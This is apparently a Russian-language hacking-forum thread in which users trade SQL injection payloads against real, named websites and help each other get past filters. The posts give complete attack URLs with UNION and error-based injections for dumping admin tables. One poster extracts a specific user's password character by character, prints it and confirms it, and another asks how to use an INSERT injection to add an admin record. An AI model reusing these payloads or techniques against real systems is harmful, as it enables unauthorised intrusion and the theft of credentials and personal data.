1 Code: http://www.xvideo.ru/catalog.php?group=7+/*!oR+1+gRoUp+bY+cOnCat%28%28SeLEcT+concat_ws%280x3a,id,password,login%29%20from%20a_admins%20limit%200,1%29,rAnD%280%29|0%29+hAvInG+miN%280%29%20*/ http://www.xvideo.ru/admin/login.php?action=send там такое: если подмутить типо такого в логин, то должно пустить поидеи: зы итак крутить через ошибку можно
может кто-нибудь помочь мне с этим? http://www.menupix.com/hoboken/restaurants.php?id=305209 Я не могу извлечь базу данных
Code: http://www.menupix.com/hoboken/restaurants.php?id=305209%20and%20%20%28/**/select%20count%28*%29%20from%20%28/**/select%201%20union%20/**/select%202/**/union/**/select%203%29x%20group%20by%20concat%28database%28%29,floor%28rand%280%29*2%29%29%29
gabarea: information_schema.tables фильтруется, поэтому делаем так: "Duplicate entry '6471' for key 1" - 647 колонок. Далее прогоняй вот так: меняя "limit+0,1" - "limit+647,1". Так сможешь вывести все имена колонок и таблиц, в которых они находятся. Дальше, надеюсь, сам разберешься.
кстати, сегодня пытаюсь зайти туда и .. ВУАЛЯ ! сайт лежит. (или ведется тех.работы) и каким то чудом информация доступна о софте: в служебном инфе есть линк на __http://drupal.org/node/258 отсюда можно делать вывод, что это Drupal движек.. хотя я думал самописный. а внизу мелким штифтом: The mysql error was: Too many connections. а тут и тип БД. P.S. DDoS или что.. ? теперь все это дело надо как небудь совместить.. если там mod_rewrite, то смогу что то ковырять в БД ? или это бесполезно?
ну это логично и я понимаю насчет уязвимостей, но там насчет запросов SQL получиться, если ничего не отображаеться на адресном сторке? mod_rewrite
такая проблема: http://www.soulmades.com/index.php?method=pubchatform&roomid=1%20union%20select%201,id,password,4,5%20from%20soul_souluser%20where+id=1101181/* вывод идет сюда: Code: <b>Private chat between <a href='index.php?ap=[B]1101181[/B]' target='_blank'>[B]lily_michelle[/B]</a> and <a href='index.php?ap=[B]539818[/B]' target='_blank'></a></b><br> 1101181 - id lily_michelle - name 539818 - password вывод возможен только числовых значений непонятки с паролем, то ли он выводится неполным, то ли еще что-то. давайте вместе помозгуем.
http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,length(password),4,5 from soul_souluser where+id=1101181/* => длина пароля 16 http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,mid(password,1,6),4,5 from soul_souluser where+id=1101181/* => первые 6 символов '539818' http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,ascii(mid(password,7,1)),4,5 from soul_souluser where+id=1101181/* => ascii код 7-го символа 99 => 'c' дальше можно самостоятельно ... добалено позже ... не, решил дальше поизвращаться http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,-(-ascii(mid(password,8,1))-100*ascii(mid(password,9,1))-100*100*ascii(mid(password,10,1))),4,5 from soul_souluser where+id=1101181/* => ascii коды 10,9,8 символа = 544955 => '716' http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,mid(password,8),4,5 from soul_souluser where+id=1101181/* => 8-13 символы = '716512' http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,-(-ascii(mid(password,14,1))-1000*ascii(mid(password,15,1))-1000*1000*ascii(mid(password,16,1))),4,5 from soul_souluser where+id=1101181/* => ascii коды 16,15,14 символа = 57049102 => 'f19' password = '539818c716512f19' проверяем http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,if(password='539818c716512f19',1,8),4,5 from soul_souluser where+id=1101181/* => 1, т.е. пароль верный кста, вариант с if(password=0x35333938313863373136353132663139,1,8) почему-то не прокатил. кто знает почему такое может быть ?
Существует такой запрос INSERT table_names SET val1=firstname, val2=lastname Значение val2 могу привести к любому виду. Задача - добавить запись в table_admin или сделать вывод из table_users. Возможно ли как-нибудь выкрутиться? *сделать insert into outfile - не могу, нет прав **обнаружить select, который бы принимал val2 пока не удалось Сорри, если это боян. Буду признателен за любую помощь.
я совсем не понял что надо делать, но если ты это хочечь то.. INSERT INTO table_users (val1, val2) values ('blabla','blabla'); выборка вывод - Select val1,val2 from table_users limit 1; а INSERT INTO outfile в первые слышу
Тоже не совсем понял, что тебе нужно, но вывод,если я правильно понимаю, можно сделать так: В поле lastname пишем запрос вида Code: ',firstname=(select {Что_угодно} from table_users limit 1),lastname='pipiska Если есть инъекция, то после выполнения запроса вместо имени будет выведено то, что было запрошено)
Сорри, что криво объяснил. OC - *nix, БД - MySQL. В БД три таблицы table_admin, table_users, table_names. В таблице table_names три поля - user_id, val1, val2. user_id - это primary key, автоинкримент. Я обращаюсь к скрипту, в котором есть такой запрос: INSERT table_names SET user_id=1 val1=firstname, val2=lastname с val2 я могу делать все что угодно. Я хочу либо слить таблицу table_users либо добавить запись в table_admin. Случай 1. Я могу привести запрос к виду: INSERT table_names SET user_id=1, val1=firstname, val2=(select {Что_угодно} from table_users limit 1) После чего весь нужный мне вывод попадает в val2 , но я его не вижу. Т.к. SELECT val2 у меня нигде не встречается. Здесь я конечно ерунду написал. Я имел ввиду, что если бы у меня были права на запись в какой-нибудь файл, то я мог бы попробовать сделать INSERT table_names SET val1=firstname, val2=(select * from table_users into outfile 'file.txt'). Но так писать в файл я по-видимому не могу =( Сегодня попробовал на локалхосте: SELECT username from table_users where user_id=1 INTO outfile 'file.txt' - так работает, файл создается INSERT table_names SET val1=firstname, val2=(SELECT username FROM table_users WHERE user_id=1 INTO outfile 'file.txt') - так не работает =( Случай 2. Оставив попытки вывести select * from table_users, я хотел добавить запись в table_admin. Пробовал так: INSERT table_names SET user_id=1 val1=firstname, val2=(lastname on duplicate key update table_admin SET <тут все что я хотел записать в table_admin>) user_id передаю заведомо дублирующийся. Но насколько я понял, таким запросом с таблицей table_admin ничего не поделаешь. А точнее так - таким запросом не возможно воздействовать ни на какую таблицу кроме table_names. Так ли это? Что еще можно попробовать сделать в первом и втором случае?
Помогите раскрутить ету скулю. Code: http://polvent.com/index.php?action=catalog&brand=-2+UnIon+selECt+1,2,3,4,5,version(),7,8,9,10,11,12,13+from+admin--+ Знаю, что таблица админ. Но к information_schema.tables доступа нет. Или что там такое? Помогите пожалуйста..
